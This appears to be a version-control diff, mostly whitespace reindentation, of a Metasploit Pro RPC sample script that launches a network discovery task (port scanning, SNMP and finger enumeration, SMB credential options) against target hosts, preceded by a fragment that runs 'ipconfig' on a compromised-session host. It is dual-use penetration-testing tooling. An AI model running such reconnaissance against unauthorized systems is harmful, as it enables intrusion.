o = cmd_exec("ipconfig")
print_line(o)
end
end

150
documentation/samples/pro/msfrpc_pro_discover.rb
View File

@ -5,19 +5,19 @@ require 'msfrpc-client'
require 'rex/ui'
def usage(ropts)
$stderr.puts ropts
$stderr.puts ropts
if @rpc and @rpc.token
wspaces = @rpc.call("pro.workspaces") rescue {}
if wspaces.keys.length > 0
$stderr.puts "Active Projects:"
wspaces.each_pair do |k,v|
$stderr.puts "\t#{k}"
end
end
end
$stderr.puts ""
exit(1)
if @rpc and @rpc.token
wspaces = @rpc.call("pro.workspaces") rescue {}
if wspaces.keys.length > 0
$stderr.puts "Active Projects:"
wspaces.each_pair do |k,v|
$stderr.puts "\t#{k}"
end
end
end
$stderr.puts ""
exit(1)
end
opts = {}
@ -27,88 +27,88 @@ parser = Msf::RPC::Client.option_parser(opts)
parser.separator('Discover Mandatory Options:')
parser.on("--project PROJECT") do |x|
opts[:project] = x
opts[:project] = x
end
parser.on("--targets TARGETS") do |x|
opts[:targets] = [x]
opts[:targets] = [x]
end
parser.on("--blacklist BLACKLIST (optional)") do |x|
opts[:blacklist] = x
opts[:blacklist] = x
end
parser.on("--speed SPEED (optional)") do |x|
opts[:speed] = x
opts[:speed] = x
end
parser.on("--extra-ports PORTS (optional)") do |x|
opts[:extra_ports] = x
opts[:extra_ports] = x
end
parser.on("--blacklist-ports PORTS (optional)") do |x|
opts[:blacklist_ports] = x
opts[:blacklist_ports] = x
end
parser.on("--custom-ports PORTS (optional)") do |x|
opts[:custom_ports] = x
opts[:custom_ports] = x
end
parser.on("--portscan-timeout TIMEOUT (optional)") do |x|
opts[:portscan_timeout] = x
opts[:portscan_timeout] = x
end
parser.on("--source-port PORT (optional)") do |x|
opts[:source_port] = x
opts[:source_port] = x
end
parser.on("--custom-nmap-options OPTIONS (optional)") do |x|
opts[:custom_nmap_options] = x
opts[:custom_nmap_options] = x
end
parser.on("--disable-udp-probes (optional)") do
opts[:disable_udp_probes] = true
opts[:disable_udp_probes] = true
end
parser.on("--disable-finger-users (optional)") do
opts[:disable_finger_users] = true
opts[:disable_finger_users] = true
end
parser.on("--disable-snmp-scan (optional)") do
opts[:disable_snmp_scan] = true
opts[:disable_snmp_scan] = true
end
parser.on("--disable-service-identification (optional)") do
opts[:disable_service_identification] = true
opts[:disable_service_identification] = true
end
parser.on("--smb-user USER (optional)") do |x|
opts[:smb_user] = x
opts[:smb_user] = x
end
parser.on("--smb-pass PASS (optional)") do |x|
opts[:smb_pass] = x
opts[:smb_pass] = x
end
parser.on("--smb-domain DOMAIN (optional)") do |x|
opts[:smb_domain] = x
opts[:smb_domain] = x
end
parser.on("--dry-run (optional)") do
opts[:dry_run] = true
opts[:dry_run] = true
end
parser.on("--single-scan (optional)") do
opts[:single_scan] = true
opts[:single_scan] = true
end
parser.on("--fast-detect (optional)") do
opts[:fast_detect] = true
opts[:fast_detect] = true
end
parser.on("--help") do
$stderr.puts parser
exit(1)
$stderr.puts parser
exit(1)
end
parser.separator('')
@ -117,9 +117,9 @@ parser.parse!(ARGV)
@rpc = Msf::RPC::Client.new(opts)
if not @rpc.token
$stderr.puts "Error: Invalid RPC server options specified"
$stderr.puts parser
exit(1)
$stderr.puts "Error: Invalid RPC server options specified"
$stderr.puts parser
exit(1)
end
# Provide default values for certain options - If there's no alternative set
@ -149,59 +149,59 @@ user = @rpc.call("pro.default_admin_user")['username']
# Create the task object with all options
task = @rpc.call("pro.start_discover", {
'workspace' => project,
'username' => user,
'ips' => targets,
'DS_BLACKLIST_HOSTS' => blacklist,
'DS_PORTSCAN_SPEED' => speed,
'DS_PORTS_EXTRA' => extra_ports,
'DS_PORTS_BLACKLIST' => blacklist_ports,
'DS_PORTS_CUSTOM' => custom_ports,
'DS_PORTSCAN_TIMEOUT' => portscan_timeout,
'DS_PORTSCAN_SOURCE_PORT' => source_port,
'DS_CustomNmap' => custom_nmap_options,
'DS_UDP_PROBES' => disable_udp_probes,
'DS_FINGER_USERS' => disable_finger_users,
'DS_SNMP_SCAN' => disable_snmp_scan,
'DS_IDENTIFY_SERVICES' => disable_service_identification,
'DS_SMBUser' => smb_user,
'DS_SMBPass' => smb_pass,
'DS_SMBDomain' => smb_domain,
'DS_SINGLE_SCAN' => single_scan,
'DS_FAST_DETECT' => fast_detect
'workspace' => project,
'username' => user,
'ips' => targets,
'DS_BLACKLIST_HOSTS' => blacklist,
'DS_PORTSCAN_SPEED' => speed,
'DS_PORTS_EXTRA' => extra_ports,
'DS_PORTS_BLACKLIST' => blacklist_ports,
'DS_PORTS_CUSTOM' => custom_ports,
'DS_PORTSCAN_TIMEOUT' => portscan_timeout,
'DS_PORTSCAN_SOURCE_PORT' => source_port,
'DS_CustomNmap' => custom_nmap_options,
'DS_UDP_PROBES' => disable_udp_probes,
'DS_FINGER_USERS' => disable_finger_users,
'DS_SNMP_SCAN' => disable_snmp_scan,
'DS_IDENTIFY_SERVICES' => disable_service_identification,
'DS_SMBUser' => smb_user,
'DS_SMBPass' => smb_pass,
'DS_SMBDomain' => smb_domain,
'DS_SINGLE_SCAN' => single_scan,
'DS_FAST_DETECT' => fast_detect
})
puts "DEBUG: Running task with #{task.inspect}"
if not task['task_id']
$stderr.puts "[-] Error starting the task: #{task.inspect}"
exit(0)
$stderr.puts "[-] Error starting the task: #{task.inspect}"
exit(0)
end
puts "[*] Creating Task ID #{task['task_id']}..."
while true
select(nil, nil, nil, 0.50)
select(nil, nil, nil, 0.50)
stat = @rpc.call("pro.task_status", task['task_id'])
stat = @rpc.call("pro.task_status", task['task_id'])
if stat['status'] == 'invalid'
$stderr.puts "[-] Error checking task status"
exit(0)
end
if stat['status'] == 'invalid'
$stderr.puts "[-] Error checking task status"
exit(0)
end
info = stat[ task['task_id'] ]
info = stat[ task['task_id'] ]
if not info
$stderr.puts "[-] Error finding the task"
exit(0)
end
if not info
$stderr.puts "[-] Error finding the task"
exit(0)
end
if info['status'] == "error"
$stderr.puts "[-] Error generating report: #{info['error']}"
exit(0)
end
if info['status'] == "error"
$stderr.puts "[-] Error generating report: #{info['error']}"
exit(0)
end
break if info['progress'] == 100
break if info['progress'] == 100
end
$stdout.puts "[+] Task Complete!"

Some files were not shown because too many files have changed in this diff Show More